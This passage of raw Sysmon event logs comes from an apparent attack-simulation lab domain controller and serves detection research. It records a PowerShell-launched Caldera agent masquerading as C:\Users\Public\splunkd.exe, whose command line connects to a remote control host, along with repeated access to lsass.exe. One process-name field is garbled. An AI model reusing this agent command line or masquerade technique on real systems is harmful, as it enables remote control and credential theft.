ystem32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001047Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:15.512{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001046Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:15.512{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001045Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:15.512{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001044Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:14.308{5D479F2C-16A1-5F84-1200-000000007F01}12081484C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|c:\windows\system32\es.dll+118e5|c:\windows\system32\es.dll+13b72|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+7d09|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be 10341000x80000000000000001043Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:14.308{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001042Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:10.980{5D479F2C-16A6-5F84-2400-000000007F01}29482968C:\Windows\system32\conhost.exe{5D479F2C-16A6-5F84-2300-000000007F01}2940C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001041Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:10.980{5D479F2C-169F-5F84-0500-000000007F01}648664C:\Windows\system32\csrss.exe{5D479F2C-16A6-5F84-2400-000000007F01}2948C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001040Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:10.965{5D479F2C-169F-5F84-0500-000000007F01}6482424C:\Windows\system32\csrss.exe{5D479F2C-16A6-5F84-2300-000000007F01}2940C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001039Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:10.965{5D479F2C-16A2-5F84-1800-000000007F01}21282812忶썹�䤼ɓ鴓�늛{5D479F2C-16A6-5F84-2300-000000007F01}2940C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+13752f|C:\Windows\System32\windows.storage.dll+1371a5|C:\Windows\System32\windows.storage.dll+136c96|C:\Windows\System32\windows.storage.dll+138108|C:\Windows\System32\windows.storage.dll+136abe|C:\Windows\System32\windows.storage.dll+10a3b5|C:\Windows\System32\windows.storage.dll+10a734|C:\Windows\System32\windows.storage.dll+109d70|C:\Windows\System32\shell32.dll+e8b0f|C:\Windows\System32\shell32.dll+e899c|C:\Windows\System32\shell32.dll+e86ec|C:\Windows\System32\shell32.dll+31537|C:\Windows\System32\shell32.dll+31495|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+33903a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+276811|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+acd828|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+271e5f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b56bc|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\68e2ec0464aa44f07e8a86705ee0d5c8\Microsoft.PowerShell.Commands.Management.ni.dll+bbdfd02a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\68e2ec0464aa44f07e8a86705ee0d5c8\Microsoft.PowerShell.Commands.Management.ni.dll+bbdfd02a(wow64) 154100x80000000000000001038Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:10.918{5D479F2C-16A6-5F84-2300-000000007F01}2940C:\Users\Public\splunkd.exe-----"C:\Users\Public\splunkd.exe" -socket 10.0.1.12:7010 -http http://10.0.1.12:8888 -contact tcp C:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=32E2535A13E90442893737530C4773D1,SHA256=C4A32E14644C0859C895A66C96AECC9647949F8295EADE40ACE7F3EFC597C6F9,IMPHASH=1CD364A9E949D5ECEBD6C614E64BC545{5D479F2C-16A2-5F84-1800-000000007F01}2128C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Unrestricted -NonInteractive -File C:\caldera_manx_agent.ps1 11241100x80000000000000001037Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.localEXE2020-10-12 08:41:10.543{5D479F2C-16A2-5F84-1800-000000007F01}2128C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Public\splunkd.exe2020-10-12 08:40:11.038 10341000x80000000000000001036Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:10.433{5D479F2C-16A2-5F84-1800-000000007F01}21282812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b335c|UNKNOWN(00007FFD965A3F41) 10341000x80000000000000001035Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:10.433{5D479F2C-16A2-5F84-1800-000000007F01}21282812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5D479F2C-169F-5F84-0900-000000007F01}788C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b335c|UNKNOWN(00007FFD965A3F41) 10341000x80000000000000001034Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:10.433{5D479F2C-16A2-5F84-1800-000000007F01}21282812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5D479F2C-16A2-5F84-2000-000000007F01}2376C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b335c|UNKNOWN(00007FFD965A3F41) 10341000x80000000000000001033Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:10.433{5D479F2C-16A2-5F84-1800-000000007F01}21282812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5D479F2C-16A1-5F84-1700-000000007F01}1840C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b335c|UNKNOWN(00007FFD965A3F41) 10341000x80000000000000001032Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:10.433{5D479F2C-16A2-5F84-1800-000000007F01}21282812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5D479F2C-16A1-5F84-1600-000000007F01}1620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b335c|UNKNOWN(00007FFD965A3F41) 10341000x80000000000000001031Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:10.433{5D479F2C-16A2-5F84-1800-000000007F01}21282812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b335c|UNKNOWN(00007FFD965A3F41) 10341000x80000000000000001030Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:10.433{5D479F2C-16A2-5F84-1800-000000007F01}21282812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5D479F2C-16A1-5F84-1300-000000007F01}1296C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b335c|UNKNOWN(00007FFD965A3F41) 10341000x80000000000000001029Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:10.433{5D479F2C-16A2-5F84-1800-000000007F01}21282812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5D479F2C-16A1-5F84-1200-000000007F01}1208C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b335c|UNKNOWN(00007FFD965A3F41) 10341000x80000000000000001028Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:10.433{5D479F2C-16A2-5F84-1800-000000007F01}21282812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5D479F2C-16A1-5F84-1100-000000007F01}1200C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b335c|UNKNOWN(00007FFD965A3F41) 10341000x80000000000000001027Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:10.433{5D479F2C-16A2-5F84-1800-000000007F01}21282812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b335c|UNKNOWN(00007FFD965A3F41) 10341000x80000000000000001026Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:10.433{5D479F2C-16A2-5F84-1800-000000007F01}21282812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5D479F2C-16A1-5F84-0F00-000000007F01}1136C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b335c|UNKNOWN(00007FFD965A3F41) 10341000x80000000000000001025Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:10.433{5D479F2C-16A2-5F84-1800-000000007F01}21282812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5D479F2C-16A1-5F84-0D00-000000007F01}1000C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b335c|UNKNOWN(00007FFD965A3F41) 10341000x80000000000000001024Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:10.433{5D479F2C-16A2-5F84-1800-000000007F01}21282812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5D479F2C-16A1-5F84-0C00-000000007F01}612C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b335c|UNKNOWN(00007FFD965A3F41) 10341000x80000000000000001023Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:10.433{5D479F2C-16A2-5F84-1800-000000007F01}21282812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5D479F2C-16A2-5F84-1C00-000000007F01}2228C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b335c|UNKNOWN(00007FFD965A3F41) 10341000x80000000000000001022Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:10.433{5D479F2C-16A2-5F84-1800-000000007F01}21282812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5D479F2C-16A2-5F84-1900-000000007F01}2204C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b335c|UNKNOWN(00007FFD965A3F41) 10341000x80000000000000001021Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 